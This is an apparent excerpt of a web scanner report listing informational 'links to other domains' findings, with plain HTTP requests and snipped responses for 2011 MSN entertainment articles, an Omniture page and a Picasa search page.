http://www.bing.com/search?q=Melissa+Leo&form=msnena
http://www.bing.com/search?q=Natalie+Portman&form=msnena
http://www.bing.com/search?q=Patty+Duke&form=msnena
http://www.bing.com/search?q=Tatum+O%27Neal&form=msnena
http://www.bing.com/search?q=Tom+Hooper&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2fmovies.msn.com%2fmovies%2farticle.aspx%3fnews%3d625907%26affid%3dfb
http://www.hulu.com/msn/http:/www.bing.com/videos/watch/video/christian-bales-sags-surprise/17wldzvrk/embed/okWl6aAGjbOtt5sFs5cJCQ
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660929&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.msn.com%2Fmovies%2Farticle.aspx%3Fnews%3D625907&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.msn.com%2fmovies%2farticle.aspx%3fnews%3d625907%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /movies/article.aspx?news=625907 HTTP/1.1
Host: movies.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 59391
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2517094174fb432cac61ae4a83e4cba2; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: CO1ENTWBA07
Date: Wed, 02 Feb 2011 15:35:29 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
'King's Sp
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=MOVIES">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296660929&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmovies.msn.com%2Fmovies%2Farticle.aspx%3Fnews%3D625907&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmovies.msn.com%2fmovies%2farticle.aspx%3fnews%3d625907%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.msn.com"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="Movie News" href="http://movies.msn.com/rss/topmovienews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..Carlo Allegri / AP " src="http://entimg.s-msn.com/i/150/News/Jan11/ColinFirth_150.jpg" alt="Colin Firth" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<P>Front-runners coasted to victory at Sunday's Screen Actors Guild Awards ... lead performers <a href=http://www.bing.com/search?q=Colin+Firth&form=msnena class="art">Colin Firth</a> as Queen Elizabeth II's stuttering dad in "The King's Speech" and <a href=http://www.bing.com/search?q=Natalie+Portman&form=msnena class="art">Natalie Portman</a>
...[SNIP]...
</a>," plus supporting players <a href=http://www.bing.com/search?q=Christian+Bale&form=msnena class="art">Christian Bale</a> as a boxer on the skids and <a href=http://www.bing.com/search?q=Melissa+Leo&form=msnena class="art">Melissa Leo</a>
...[SNIP]...
<P>"The King's Speech" also won the SAG award for overall acting ensemble. A day earlier, the film was an upset winner at the Directors Guild of America Awards, where its filmmaker <a href=http://www.bing.com/search?q=Tom+Hooper&form=msnena class="art">Tom Hooper</a> triumphed over <a href=http://www.bing.com/search?q=David+Fincher&form=msnena class="art">David Fincher</a>
...[SNIP]...
<P>Portman faces tough competition from <a href=http://www.bing.com/search?q=Annette+Bening&form=msnena class="art">Annette Bening</a>
...[SNIP]...
<P>And the supporting-actress lineup includes a dazzling performance from 14-year-old <a href=http://www.bing.com/search?q=Hailee+Steinfeld&form=msnena class="art">Hailee Steinfeld</a>
...[SNIP]...
</a>." This is the one Oscar category where teens and preteens have shone, with past wins by 16-year-old <a href=http://www.bing.com/search?q=Patty+Duke&form=msnena class="art">Patty Duke</a>
...[SNIP]...
</a>"), 11-year-old <a href=http://www.bing.com/search?q=Anna+Paquin+&form=msnena class="art">Anna Paquin</a>
...[SNIP]...
</a>") and 10-year-old <a href=http://www.bing.com/search?q=Tatum+O%27Neal&form=msnena class="art">Tatum O'Neal</a>
...[SNIP]...
<P>Predictable though the awards may be, there still was room for spontaneity Sunday night. As Bale came on stage to collect his SAG Award, his real-life counterpart ... former boxer <a href=http://www.bing.com/search?q=Dicky+Eklund&form=msnena class="art">Dicky Eklund</a>
...[SNIP]...
<P><a href=http://www.bing.com/search?q=Geoffrey+Rush&form=msnena class="art">Geoffrey Rush,</a>
...[SNIP]...
<P>"It's so great to hear a speech that kind of galvanizes the psyche of a country," Rush said backstage at the SAG Awards, alongside Firth and supporting-actress nominee <a href=http://www.bing.com/search?q=Helena+Bonham+Carter&form=msnena class="art">Helena Bonham Carter</a>
...[SNIP]...
</PARAM><EMBED height=288 type=application/x-shockwave-flash width=512 src=http://www.hulu.com/msn/http%3A%2F%2Fwww.bing.com%2Fvideos%2Fwatch%2Fvideo%2Fchristian-bales-sags-surprise%2F17wldzvrk/embed/okWl6aAGjbOtt5sFs5cJCQ allowFullScreen="true"></EMBED>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fmovies.msn.com%2fmovies%2farticle.aspx%3fnews%3d625907%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for "More Movie News"" href="/rss/topmovienews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for "Just In News"" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

17.151. http://music.msn.com/music/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://music.msn.com
Path:	/music/article.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://music.msn.com/music/article.aspx?news=626003&gt1=28102

The response contains the following links to other domains:

http://choice.live.com/default.aspx
http://download.live.com/?sku=messenger
http://entcss.s-msn.com/App_Themes/IE7/IE79613.css
http://entcss.s-msn.com/styles/entertainment9613.css
http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css
http://entcss.s-msn.com/styles/tvvertical9613.css
http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js
http://entimg.s-msn.com/i/150/News/July09/cobain_150.jpg
http://entimg.s-msn.com/i/grandprix/Digg.gif
http://entimg.s-msn.com/i/grandprix/discuss.gif
http://entimg.s-msn.com/i/grandprix/leftNavBg.gif
http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif
http://entimg.s-msn.com/i/grandprix/mail.gif
http://entimg.s-msn.com/i/grandprix/msft.png
http://entimg.s-msn.com/i/grandprix/nav_pipe.gif
http://entimg.s-msn.com/i/grandprix/spacesBlog.gif
http://entimg.s-msn.com/i/ms/RssIcon.gif
http://entimg.s-msn.com/i/ms/ms_logo.gif
http://entimg.s-msn.com/i/sp.gif
http://go.microsoft.com/fwlink/?LinkId=74170
http://help.live.com/resources/neutral/launchhelp.js
http://img.widgets.video.s-msn.com/js/ch/channels.css
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalent.112.2o7.net/b/ss/msnportalent/1/H.1--NS/0
http://nerdist.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?Form=a17
http://www.bing.com/search?q=Kurt+Cobain&form=msnena
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.facebook.com/share.php?u=http%3a%2f%2fmusic.msn.com%2fmusic%2farticle.aspx%3fnews%3d626003%26affid%3dfb
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661087&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmusic.msn.com%2Fmusic%2Farticle.aspx%3Fnews%3D626003%26gt1%3D28102&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmusic.msn.com%2fmusic%2farticle.aspx%3fnews%3d626003%26gt1%3d28102%26ppcb%3d
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /music/article.aspx?news=626003&gt1=28102 HTTP/1.1
Host: music.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 50633
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: stad=; path=/
Set-Cookie: MC1=V=3&GUID=2cce766a6a6f473ba30e694c272dcc30; domain=.msn.com; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-Powered-By: ASP.NET
Server: wba26
Date: Wed, 02 Feb 2011 15:38:07 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
Cobain's s
...[SNIP]...
<link rel="shortcut icon" href="http://blstc.msn.com/br/gbl/lg/1/favicon.ico" /><link rel="stylesheet" href="http://entcss.s-msn.com/styles/entertainment9613.css" rev="stylesheet" type="text/css"/><link rel="stylesheet" href="http://entcss.s-msn.com/styles/gtl_sitegeneric9613.css" rev="stylesheet" type="text/css"/>
<link rel="stylesheet" href="http://entcss.s-msn.com/styles/tvvertical9613.css" rev="stylesheet" type="text/css"/>

<style>
...[SNIP]...
</style>

<link rel="stylesheet" href="http://entcss.s-msn.com/App_Themes/IE7/IE79613.css" rev="stylesheet" type="text/css"/><SCRIPT language=JavaScript src="http://entimg.msn.com/i/jScript/addCSSandSCRIPTtoHEAD.js" type=text/javascript>
...[SNIP]...
</SCRIPT>
<link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-msn.com/js/ch/channels.css">
<link rel="stylesheet" type="text/css" href="http://entimg.msn.com/i/css/news_article_page_cntwmodule_08.css"/>
...[SNIP]...
<![endif]-->
<script src="http://help.live.com/resources/neutral/launchhelp.js" type="text/javascript"></script>
...[SNIP]...
</script><img id="clickTarget" style="display:none" src="http://entimg.s-msn.com/i/sp.gif" onReadyStateChange="if(SF('ctStateChange')) ctStateChange();" alt="" ></object>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com" rel="">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb" rel="">MLB</a></li><li class=""><a href="http://msn.foxsports.com/nascar " rel="">NASCAR</a></li><li class=""><a href="http://msn.foxsports.com/nba" rel="">NBA</a></li><li class=""><a href="http://msn.foxsports.com/collegebasketball" rel="">NCAA Basketball</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/cfb" rel="">NCAA Football</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nfl" rel=""><strong>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/nhl" rel="">NHL</a></li><li class=""><a href="http://msn.foxsports.com/fantasy" rel="">Play Fantasy</a>
...[SNIP]...
<li class=""><a href="http://msn.foxsports.com/foxsoccer" rel="">Soccer</a></li><li class=""><a href="http://msn.foxsports.com/video?from=en-us_msnhp" rel="">Video Highlights</a>
...[SNIP]...
<li class=""><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" rel="">Careers & Jobs</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel=""> Cooking</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " rel=""> Travel</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" rel="">Maps & Directions</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" rel="">Video</a>
...[SNIP]...
<li class=""><a href="http://insidemsn.wordpress.com" rel="">Corrections & Clarifications</a>
...[SNIP]...
<li class=""><a href="http://msn.whitepages.com/" rel="">White Pages</a>
...[SNIP]...
<li class=""><a href="http://www.delish.com/" rel="">Delish</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/shopping?FORM=SHOPH2" rel="">Shopping</a></li><li class=""><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" rel="">Feedback</a>
...[SNIP]...
<li class=""><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " rel="">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?Form=a17">Bing</a>
...[SNIP]...
<li id="first"><a href="http://mail.live.com">Hotmail</a><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661087&rver=5.5.4177.0&wp=MBI&wreply=http:%2F%2Fmusic.msn.com%2Fmusic%2Farticle.aspx%3Fnews%3D626003%26gt1%3D28102&lc=1033&id=75104&cb=wreply%3dhttp%3a%2f%2fmusic.msn.com%2fmusic%2farticle.aspx%3fnews%3d626003%26gt1%3d28102%26ppcb%3d">Sign in</a>
...[SNIP]...
<a href="http://www.msn.com"><img id="msnLogo" src="http://entimg.s-msn.com/i/grandprix/msft.png" alt="MSN" style="border-width:0px;" /></a>
...[SNIP]...
<div class=""><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
</a><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
</a><img class="pageHeader_horizonalButtonSeparator" src="http://entimg.s-msn.com/i/grandprix/nav_pipe.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="leftNav_content"><img class="leftNav_bg" src="http://entimg.s-msn.com/i/grandprix/leftNavBg.gif" style="border-width:0px;" /><div class="MoviesleftNav_linkDiv">
...[SNIP]...
<span class="leftNav_disabled"><img src='http://entimg.s-msn.com/i/grandprix/leftNavSeperator.gif' /></span>
...[SNIP]...
<a title="Music News" href="http://music.msn.com/rss/topmusicnews"> <img src='http://entimg.s-msn.com/i/ms/RssIcon.gif' style='border-width:0px;' class='NewsRssIconClass'/></a>
...[SNIP]...
<div class="ArticleImageDivCss"> <img title="..AP file photo" src="http://entimg.s-msn.com/i/150/News/July09/cobain_150.jpg" alt="Kurt Cobain" style="height:200px;width:150px;border-width:0px;" /><div class="ArticleCaptionCss">
...[SNIP]...
<p>Voice actor Billy West says Nirvana star <a href=http://www.bing.com/search?q=Kurt+Cobain&form=msnena class="art">Kurt Cobain</a>
...[SNIP]...
</P>In a podcast for <a href=http://nerdist.com/ class="art" target="new">Nerdist.com</a>
...[SNIP]...
<div class="newsToolBarCommentsIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/discuss.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarMailIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/mail.gif" style="border-width:0px;" /></div>
...[SNIP]...
<div class="newsToolBarDiggIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/Digg.gif" style="border-width:0px;" /></div>
...[SNIP]...
</style><a href='http://www.facebook.com/share.php?u=http%3a%2f%2fmusic.msn.com%2fmusic%2farticle.aspx%3fnews%3d626003%26affid%3dfb' onclick='return fbs_click()' target='_blank' class='fb_share_link'>Facebook</a>
...[SNIP]...
<div class="newsToolBarSpacesIconDiv"><img src="http://entimg.s-msn.com/i/grandprix/spacesBlog.gif" style="border-width:0px;" /></div>
...[SNIP]...
<a title="RSS for "More Music News"" href="/rss/topmusicnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<a title="RSS for "Just In News"" href="/rss/entnews"><img src="http://entimg.s-msn.com/i/ms/RssIcon.gif" style="border-width:0px;" /></a>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<td class="adText"><a href="http://choice.live.com/default.aspx"><img src="http://blstc.msn.com/br/chan/css/decoration/adchoicesv4.png"/>
...[SNIP]...
<div class="pageFooter_link"><a href="http://go.microsoft.com/fwlink/?LinkId=74170" target="_new">MSN Privacy</a>
...[SNIP]...
<div class="pageFooter_logo"><img id="microsoftLogo" src="http://entimg.s-msn.com/i/ms/ms_logo.gif" style="border-width:0px;" /></div>
...[SNIP]...
<noscript><img src="http://msnportalent.112.2O7.net/b/ss/msnportalent/1/H.1--NS/0" height="1" width="1" border="0" alt="" /></noscript>
...[SNIP]...
<script type="text/javascript" src="http://entertainment.msn.us.intellitxt.com/ast/js/msn/entertainment.msn_cs.js"></script>
...[SNIP]...

17.152. https://my.omniture.com/p/suite/1.2/index.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://my.omniture.com
Path:	/p/suite/1.2/index.html

Issue detail

The page was loaded from a URL containing a query string:

https://my.omniture.com/p/suite/1.2/index.html?a=Main.SSOHelp&ssSession=a7c9e0ff5f9e34e1244401d33bd8bc67&jpj=95253754444132

The response contains the following links to other domains:

https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.6.0.2.js
https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js

Request

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:30:42 GMT
Server: Omniture AWS/2.0.0
Vary: Accept-Encoding,User-Agent
xserver: www455
Content-Type: text/html
Connection: close
Content-Length: 27676

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1">
<!--[if I
...[SNIP]...
</script>
<script type="text/javascript" charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/ext-base-mbox38-proto1.6.0.2.js"></script>
...[SNIP]...
<body class="popup" id='bodyid' class="yui-skin-sam no_min_width" >
<script type="text/javascript" charset="utf-8" src="https://www.omniture-static.com/js/ext/ext-base/opth.21.survey.js"></script>
...[SNIP]...

17.153. http://picasaweb.google.com/lh/view previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://picasaweb.google.com
Path:	/lh/view

Issue detail

The page was loaded from a URL containing a query string:

http://picasaweb.google.com/lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq

The response contains the following links to other domains:

http://googlephotos.blogspot.com/
http://lh3.ggpht.com/s/v/71.12/script/lh_searchview.js
http://lh4.ggpht.com/s/v/71.12/styles/lh.css
http://lh5.ggpht.com/s/v/71.12/img/logo/pwa-en_US.gif
http://lh5.ggpht.com/s/v/71.12/img/transparent.gif
http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1

Request

GET /lh/view?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=wq HTTP/1.1
Host: picasaweb.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Expires: Wed, 02 Feb 2011 15:38:33 GMT
Date: Wed, 02 Feb 2011 15:38:33 GMT
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: _rtok=A_-4ez2PZ9po; Path=/; HttpOnly
Set-Cookie: S=photos_html=xuwI-f5emUWsQ1mdK9w-tA; Domain=.google.com; Path=/; HttpOnly
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-
...[SNIP]...
</style>
<link rel="stylesheet" type="text/css" href="http://lh4.ggpht.com/s/v/71.12/styles/lh.css" />
</head>
<body onload="_report();_onload();"
class="lhcl_lang_en_US goog-app
lhcl_googlephotos_body">
<script src="http://lh3.ggpht.com/s/v/71.12/script/lh_searchview.js"></script>
...[SNIP]...
</a> <a href="http://www.youtube.com/results?q=ges&hl=en&ie=UTF-8&tab=q1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<a href="/">
<img src="http://lh5.ggpht.com/s/v/71.12/img/logo/pwa-en_US.gif" id="lhid_logo" alt="Picasa Web Albums" /></a>
...[SNIP]...
